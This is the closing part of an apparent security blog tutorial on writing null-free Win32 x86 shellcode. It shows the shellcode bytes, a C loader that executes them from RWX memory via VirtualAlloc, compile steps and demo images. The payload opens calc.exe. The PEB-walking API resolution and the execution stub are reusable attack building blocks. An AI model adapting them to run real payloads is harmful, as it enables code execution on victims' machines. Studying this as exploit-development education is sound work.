<span class="s2">"</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">43"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">ff"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">89"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">52"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">73"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">6f"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">45</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0"</span>
</code></pre></div></div>
<p>The shellcode.c file</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <windows.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">shellcode</span> <span class="o">=</span> \
<span class="s">"</span><span class="se">\x31\xc9\xf7\xe1\x64\x8b\x41</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x0a\x72\x65\x73\x73\x75\xeb\x8b\x72\x24\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\x14\x8e\x01\xda\x89\xd5\x31\xc9\x68\x73</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x72\x65\x61\x54\x53\xff\xd2\x31\xc9\xb1\xff</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x31\xff\x57\xe2\xfd\x68\x63\x61\x6c\x63\x89</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xe1\x51\x51\x31\xd2\x52\x52\x52\x52\x52\x52</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x51\x52\xff\xd0\x83\xc4\x10\x68\x65\x73\x73</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd5\x31</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc9\x51\xff\xd0</span><span class="s">"</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"shellcode length: %i"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="n">LPVOID</span> <span class="n">lpAlloc</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">lpAlloc</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">lpAlloc</span><span class="p">)();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Compile it on Windows</p>
<pre><code class="language-dos">c:\MinGW\bin>gcc shellcode.c -o shellcode
</code></pre>
<p>Windows 7 (x86)
<img src="/assets/images/windows/x86/getcalc_0.gif" alt="" /><br /></p>
<p>and Windows 10 (x86)</p>
<p><img src="/assets/images/windows/x86/getcalc_1.gif" alt="" /><br /></p>
<p>The length is 176 bytes and is NULL free.<br />
<a href="https://blackcloud.me/Win32-shellcode-3/">In the next post</a> we will spawn a MessageBox with a custom title and message.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://nostarch.com/malware">This amazing book</a> help me a lot understand how Win32 kernel API works</li>
<li><a href="https://h0mbre.github.io/Babys-First-Shellcode/">The amazing h0mbre blog</a></li>
<li><a href="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/">Introduction to Windows Shellcode Development – Part 3</a> by <a href="https://twitter.com/NytroRST/">@NytroRST</a></li>
<li><a href="https://0xdarkvortex.dev/index.php/2019/03/18/windows-shellcoding-x86-hunting-kernel32-dll-part-1/">Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1</a> by <a href="https://twitter.com/NinjaParanoid">@NinjaParanoid</a></li>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#ws">Shellcoding for Linux and Windows Tutorial</a> by <a href="https://twitter.com/lestevehanna">Steve Hanna</a></li>
<li><a href="http://hick.org/code/skape/papers/win32-shellcode.pdf">A good paper book</a></li>
<li><a href="https://marcosvalle.github.io/re/exploit/2019/01/19/messagebox-shellcode.html">Windows x86 MessageBox shellcode</a> by <a href="https://twitter.com/_mvalle_">@MValle</a></li>
<li><a href="https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html">The PacketStorm Calc Shellcode</a></li>
<li><a href="https://github.com/bolonobolo/shellcode">My Github Win x86 shellcode repo</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}